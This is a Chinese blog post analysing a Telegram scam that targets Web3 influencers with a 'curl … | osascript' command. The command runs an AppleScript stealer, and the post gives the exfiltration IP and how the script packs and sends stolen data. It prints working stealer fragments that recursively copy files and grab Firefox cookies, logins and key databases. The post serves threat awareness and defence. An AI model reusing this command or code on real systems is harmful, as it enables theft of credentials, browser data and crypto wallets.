文章总结： 这篇文章揭露了一种针对Web3领域KOL的诈骗手法，诈骗者通过Telegram发送osascript命令诱导受害者执行恶意脚本。该脚本会自动收集系统上的Web3相关文件、浏览器敏感数据、钱包插件信息等，并将数据打包发送到特定IP地址45.13.225.235。作者认为这种手法较为过时，主要针对缺乏安全意识的人群，并提醒用户不要轻易点击陌生人发送的链接或执行可疑命令。 综合评分： 81 文章分类： 安全意识,威胁情报,WEB安全

记录一次Web3骗子诈骗手法

ner0p1r

Gh0xE9

2025年12月14日 21:35 福建 标题已修改

这几天在tg上发现了一些专门诈kol的骗子，他们大多数都是以发推推广或者返佣形式来骗取kol的钱包等信息，并且诈骗手段极其弱智与无脑，说白了只有缺乏安全意识的人才会上当他们所用的手法。

大概一周前，有人在tg发了一条用osascript执行一个脚本的命令，然后附上了使用这条命令就能获得一些信息，链接大概是这样子的

curl http://whitexxx.xxxxxxx/xxxxxx.xxxx | osascript

当被害者输入这条命令后，会自动下载一个applescript脚本，然后用osascript来执行，这个脚本非常无脑，你甚至还能在其中看到LLM生成的痕迹，只能说这个年代还用脚本来钓鱼的真的是脑子有点😅

image-20251214211720326

脚本会自动化收集被害者系统上的文件，大多数都是有关Web3的，执行这个脚本后会在后台静默执行

image-20251214211933827

主要是递归遍历文件和文件夹以及系统上的一些敏感信息，遍历文件夹甚至还有排除选项，看来是为了不让服务器塞入一些没用的东西

on GrabFolderLimit(sourceFolder, destinationFolder)
    try
        set bankSize to 0
        set exceptionsList to {".DS_Store", "Partitions", "Code Cache", "Cache", "market-history-cache.json", "journals", "Previews"}
        set fileList to list folder sourceFolder without invisibles
        mkdir(destinationFolder)
        repeat with currentItem in fileList
            if currentItem is not in exceptionsList then
                set itemPath to sourceFolder & "/" & currentItem
                set savePath to destinationFolder & "/" & currentItem
                if isDirectory(itemPath) then
                    GrabFolderLimit(itemPath, savePath)
                else
                    set fsz to filesizer(itemPath)
                    set bankSize to bankSize + fsz
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if bankSize < 10 * 1024 * 1024 then
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; readwrite(itemPath, savePath)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; end if
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; end if
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; end if
&nbsp; &nbsp; &nbsp; &nbsp; end repeat
&nbsp; &nbsp; end try
end GrabFolderLimit

最主要的是自动搜集浏览器敏感数据例如Cookie、密码（以文件存储的形式）

on parseFF(firefox, writemind)
    try
        set myFiles to {"/cookies.sqlite", "/formhistory.sqlite", "/key4.db", "/logins.json"}
        set fileList to list folder firefox without invisibles
        repeat with currentItem in fileList
            set fpath to writemind & "ff/" & currentItem
            set readpath to firefox & currentItem
            repeat with FFile in myFiles
                readwrite(readpath & FFile, fpath & FFile)
            end repeat
        end repeat
    end try
end parseFF

然后就是一系列的Chrome钱包插件和浏览器数据窃取，Telegram劫持，以及桌面钱包应用窃取

image-20251214212027757

image-20251214212054236

image-20251214212405028

最后就是把上面搜刮到的文件打包成out.zip发送到45.13.225.235这个IOC

image-20251214212433280

接着就是清理痕迹

image-20251214212551323

只能说这个诈骗手段放在10～16年那会bat时代还有人上当受骗，现在的话用这种还是太过时了，也是希望大家别打开陌生人发过来的钓鱼链接，包括但不限于淘宝一些用irm激活的或者咸鱼上让你打开powershell用certutil下东西的

真好，又水一篇😋

查看原文：《记录一次Web3骗子诈骗手法》